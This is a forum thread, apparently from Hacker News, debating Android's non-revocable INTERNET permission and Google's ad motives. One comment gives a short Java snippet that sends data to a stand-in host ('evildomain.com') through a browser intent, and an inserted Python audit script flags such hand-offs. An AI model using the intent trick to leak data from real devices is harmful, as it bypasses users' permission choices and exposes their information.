zlacker

1. kllrno+(OP) 2025-08-25 21:02:02
> But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.

The internet permission has nothing to do with ads? It's a hidden permission because:

1) Internet connection is so ubiquitous as to just be noise if displayed

2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar

replies(3): >>876368+g4 >>tgsovl+c5 >>zrobot+Bf
2. 876368+g4 2025-08-25 21:26:40
>>kllrno+(OP)
> 1) Internet connection is so ubiquitous as to just be noise if displayed

That doesn't make it any less useful.

> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar

I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?

replies(2): >>UncleM+le >>GuB-42+Pg
3. tgsovl+c5 2025-08-25 21:31:54
>>kllrno+(OP)
It absolutely has to do with ads. While there are various ways to exfiltrate small amounts of data, the non-collaborative ones are rarely silent and most importantly, they won't let the app get responses (e.g. ads) back.

The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?

replies(1): >>kllrno+Hv
4. UncleM+le 2025-08-25 22:23:12
>>876368+g4
> I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.

   Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE");
   Intent i = new Intent(Intent.ACTION_VIEW, uri);
   startActivity(i);

Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.
replies(3): >>broker+Nk >>sterli+nR >>noname+wk1
5. zrobot+Bf 2025-08-25 22:30:26
>>kllrno+(OP)
I mean, I just did a quick look over the installed apps on this phone and ~1/4 of them would work perfectly well without an internet connection, things like a level or GPS speedometer that use the phone sensor or apps for Bluetooth control of devices [like 0] . Why would something like a bubble level app need internet access for anything besides telemetry or ads? I realize I have way more of these types of apps than the average user, but apps like this aren't a super-niche thing that would be on 0.1% of devices.

I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.

replies(1): >>kllrno+gw
6. GuB-42+Pg 2025-08-25 22:39:21
>>876368+g4
> I've never managed to find even a single PoC bypassing it

Because it is obvious. Just open a web browser.

More details here: https://old.reddit.com/r/androiddev/comments/ci4tdq/were_on_...

7. broker+Nk 2025-08-25 23:06:17
>>UncleM+le
> would be a catastrophic change to the ecosystem.

Hey we were already on board with this, you don't have to convince us.

replies(1): >>UncleM+9s
8. UncleM+9s 2025-08-26 00:06:26
>>broker+Nk
The effect of this would be to make all apps request all permissions because even if you are just using some other app for a particular feature you need, you have no control over what other permissions they might add which would suddenly break any intents you send them. The only defense would be to request everything.

You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?

replies(1): >>ycombi+Jw
9. kllrno+Hv 2025-08-26 00:43:22
>>tgsovl+c5
> The main thing this permission would be used for would be blocking ads.

This permission has existed for longer than runtime permissions. You have never been able to revoke it, it was just something you agreed to when you installed the app or you didn't install the app.

It was "removed" in that era because if every app requests the same permission, then nobody cares about it anymore. When every app asks for the same thing, users stop paying attention to it. So no, it had fuck all to do with ads because that was never a thing in the first place. And ad blocking doesn't require this permission, either.

> Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?

You can still use it for this. Apps are required to declare the permission still, it's listed on the Play Store under the "permissions" section. Similarly the OS reports the same thing. Presumably F-droid or whatever else also has a list of permissions before you install, and it'll be listed there.

Although Google's own Calculator app requires Internet permission. Take that for what it's worth.
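
An added example, not part of the thread or written by any commenter: a static check that combines two points made above, that the INTERNET permission is still declared in the manifest and that an app without it can hand a URL to the browser with `ACTION_VIEW`. It flags such hand-offs and separates fixed links from URLs built at runtime. The function names, the constructed manifest and sources, and the `example.com` URLs are assumptions; the regex is a heuristic over decompiled or source Java, not a complete analysis.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"
INTERNET = "android.permission.INTERNET"

# Constructed sample: decoded manifest of a hypothetical offline calculator.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.calc">
  <uses-permission android:name="android.permission.VIBRATE"/>
  <application android:label="Calc"/>
</manifest>"""

# Constructed sample sources (file name -> Java text).
SAMPLE_SOURCES = {
    "About.java": 'Uri u = Uri.parse("https://example.com/help");\n'
                  'startActivity(new Intent(Intent.ACTION_VIEW, u));',
    "Sync.java": 'Uri u = Uri.parse("https://example.com/u?d=" + notes);\n'
                 'startActivity(new Intent(Intent.ACTION_VIEW, u));',
}

# Uri.parse("http(s)://...") optionally followed by '+' (runtime data appended).
URI_PARSE = re.compile(r'Uri\.parse\(\s*"(https?://[^"]*)"\s*(\+)?')

def declared_permissions(manifest_xml):
    """Collect permission names from <uses-permission> style elements."""
    root = ET.fromstring(manifest_xml)
    perms = set()
    for tag in ("uses-permission", "uses-permission-sdk-23"):
        for el in root.iter(tag):
            name = el.get(ANDROID_NS + "name")
            if name:
                perms.add(name)
    return perms

def audit(manifest_xml, sources):
    """Flag web-URL hand-offs in an app that does not declare INTERNET."""
    if INTERNET in declared_permissions(manifest_xml):
        return []  # app can reach the network directly; nothing to flag here
    findings = []
    for path, text in sorted(sources.items()):
        if "ACTION_VIEW" not in text:
            continue
        for m in URI_PARSE.finditer(text):
            # A URL concatenated with a variable deserves review; a fixed
            # link is the ordinary "open our web page" case.
            kind = "dynamic-url" if m.group(2) else "static-link"
            findings.append((path, kind, m.group(1)))
    return findings
```

The `static-link` result is the benign case the thread keeps returning to (an app linking out to a web page), which is why only the `dynamic-url` findings are worth a reviewer's time.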

10. kllrno+gw 2025-08-26 00:48:21
>>zrobot+Bf
There's plenty of actually problematic stuff Google does (like this change in the article), there's no need to make up whack ass conspiracy theories, too.
replies(3): >>ycombi+6x >>zrobot+Sy >>const_+FQ1
11. ycombi+Jw 2025-08-26 00:52:10
>>UncleM+9s
Similar changes have been done before, the security sandbox behaves differently based on the app's minimum/target API level for backwards compatibility.

That's also why there's a warning before installing really old apps, they may run with extra permissions.

12. ycombi+6x 2025-08-26 00:55:56
>>kllrno+gw
The internet permission is the only regular manifest permission you can't toggle in the settings. It is an obvious win for an advertising/surveillance company like Google. What is wack about it?
replies(1): >>kllrno+US
13. zrobot+Sy 2025-08-26 01:11:55
>>kllrno+gw
Huh? Not sure how this qualifies as "whack ass". There's an internet permission built in to the OS that Google chose to not expose to the user. The parent poster was claiming there is no reason anyone would want that permission, I then pointed out a whole category of apps that don't need internet to function for anything besides ads and telemetry. All of this is factual info.

So rather than just dismissing the argument via insulting language, can you provide a reasonable alternative explanation for why this setting isn't exposed to the user?

replies(1): >>kllrno+1T
14. sterli+nR 2025-08-26 04:26:45
>>UncleM+le
so? pop up a permission prompt. have the user confirm.

and isn't it immediately apparent that the app is leaking data if your calculator is popping a webview?

replies(1): >>UncleM+RZ
15. kllrno+US 2025-08-26 04:46:52
>>ycombi+6x
> The internet permission is the only regular manifest permission you can't toggle in the settings.

That's not even a little bit true? There's a ton of 'normal' permissions, almost none of which are user-overrideable. Like, say, android.permission.VIBRATE. Or android.permission.GET_PACKAGE_SIZE. Android has an obscene number of permissions ( https://developer.android.com/reference/android/Manifest.per... ) and almost none of them have a UI to control them nor any ability to be rejected

> It is an obvious win for an advertising/surveillance company like Google. What is wack about it?

How, exactly? How does Google benefit from random 3p apps having Internet access? And remember, Google has play services on every device to proxy anything it needs/wants.

replies(1): >>ycombi+OD1
16. kllrno+1T 2025-08-26 04:48:51
>>zrobot+Sy
The internet permission is exposed to the user, it just can't be revoked by the user. But that's true of like 100 other permissions, too. It's the default case that permissions are not revokable.

And I did provide 2 reasons why that's the case for Internet specifically, neither of which were even attempted to be refuted in this comment chain

replies(2): >>adithy+WW >>zrobot+bo1
17. adithy+WW 2025-08-26 05:31:27
>>kllrno+1T
I would really like to deny internet access for apps like mx player. The frequency of ads on that app once Times group bought is the worst I've seen in my entire life. One of the best video players on Android, ruined.

Some Chinese skins do offer the ability to revoke internet access for apps. I wonder why the western ones don't?

18. UncleM+RZ 2025-08-26 06:03:19
>>sterli+nR
"Pop up a permission prompt every single time an app links out to a browser" is not going to be a thing that users like.

Yes, this is a little suspicious. But you just have the evil page redirect to google.com or something benign. To the user it looks like "huh, chrome just opened on its own."

replies(1): >>jech+7n1
19. noname+wk1 2025-08-26 09:01:54
>>UncleM+le
I don’t see why you couldn’t disallow opening URL intents. App intents that enable to exfiltrate data should be cracked down on by Google, it’s basically a privilege escalation.
replies(1): >>UncleM+cy1
20. jech+7n1 2025-08-26 09:31:32
>>UncleM+RZ
> "Pop up a permission prompt every single time an app links out to a browser" is not going to be a thing that users like.

Calculator.apk wants to open the web page https://eviltracker.example.com. Allow this time? Allow for 24 hours? Allow and don't ask me again?

replies(1): >>UncleM+Dy1
21. zrobot+bo1 2025-08-26 09:41:43
>>kllrno+1T
OK, so this is getting ridiculous. The internet permission isn't exposed to the user, unless you are saying that 'exposed to the user' is the same as 'system default and can't be modified'. The user has no way to see or modify that permission.

I pretty solidly refuted your first reason (internet connection is ubiquitous, apps don't need it). I pointed out that there are whole categories of apps that don't need a network connection. You never bothered to refute my argument and are now claiming that I didn't address that point. You claim it is a 'ubiquitous' permission, but haven't said why a level sensor app that just reads the MEMS gyro sensor would need a network connection at all. So that's point 1 sorted, which I already addressed and you are pretending wasn't refuted.

Point 2 was "2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar"

I never addressed this, because it seemed extraneous to the discussion. This data exfiltration is purely a hypothetical at this point, since apps can always rely on a network connection. Sure, if the network setting was exposed to the user and was able to be toggled, there might be ways to bypass that. But that is hypothetical, and relies on hypothetical security loopholes. No apps are currently doing this, since apps can't have their network permissions toggled. The possibility of potentially bypassing the system network permission toggle doesn't seem germane, since it's a hypothetical. To use your words, it's a 'whack-ass conspiracy theory' and not a germane concern.

You've resorted to ad-hominem by insinuating that my viewpoint is a conspiracy theory and haven't even attempted to address my point that there are whole categories of apps that don't need network connections. You also are trying to claim that I haven't addressed points you made, while ignoring my argument that rebutted those claims. I'm sorry, but since you want to engage in this way, why are you so addicted to the taste of Google boot leather? Why are you trying to say that Google doesn't want to protect its ad network? Android apps using Google adsense to serve ads to users clearly benefits them, I don't even see why this is controversial.

22. UncleM+cy1 2025-08-26 11:06:11
>>noname+wk1
"No links to web uris allowed" would be a pretty intense restriction. Now the free calculator can't even link to the paid version on the app store. There's already precious few apps that don't really need internet access (usually simple tools apps that don't have ads) and this even further limits that set.
23. UncleM+Dy1 2025-08-26 11:09:19
>>jech+7n1
Do we show this annoying popup (that the large majority of the time will be benign and just aggravate users) for all apps, or just those that don't request the internet permission?

Doing this for all apps would be wild. Doing this just for those that don't request the internet permission just encourages more apps to request it (it is basically universally used anyway). "Huh, why does my calculator need internet" has never actually been effective at helping people avoid malware at any meaningful scale.

replies(1): >>const_+aq2
24. ycombi+OD1 2025-08-26 11:55:13
>>kllrno+US
Half of the random 3p apps include Google advertising SDKs. How do you reconcile the fact that the internet permission still cannot be toggled, almost 20 years after it was required in the app manifest?
25. const_+FQ1 2025-08-26 13:13:24
>>kllrno+gw
Google relies on ad money is a conspiracy? ... isn't that just... their business model? Like actually?

I mean, would you chop off your own foot? No? Then we should all be in agreeance. Google is definitely forcing network permission for every app to maximize their ad revenue.

26. const_+aq2 2025-08-26 15:54:42
>>UncleM+Dy1
> Doing this for all apps would be wild.

No it wouldn't, not at all.

90% of apps on your phone do not need to be apps. Facebook does not need to be an app. Instagram does not need to be an app.

This is a sober reminder that apps are executable code that is running on your phone with very little sandbox. It's not like a web browser.

We do not need to execute compiled binaries that are closed source to buy parking that one time. No, no we don't.

Why do we? Because as I've said - such apps are much more powerful than the web browser and can therefore be used as spyware or keyloggers. Most apps on Android, including most Google apps, can be regarded as spyware.

Companies don't want to give up their de facto malware they've built up, and now users are trained to just install whatever the fuck on their phone.

We have given software 1000x more permission than it needs to do what it does. And now, we sit back and complain about malware.

This starts with Google, this starts with Meta, this starts with big tech. They directly caused all this malware by forcing users into downloading executables so they can exfiltrate your key presses.
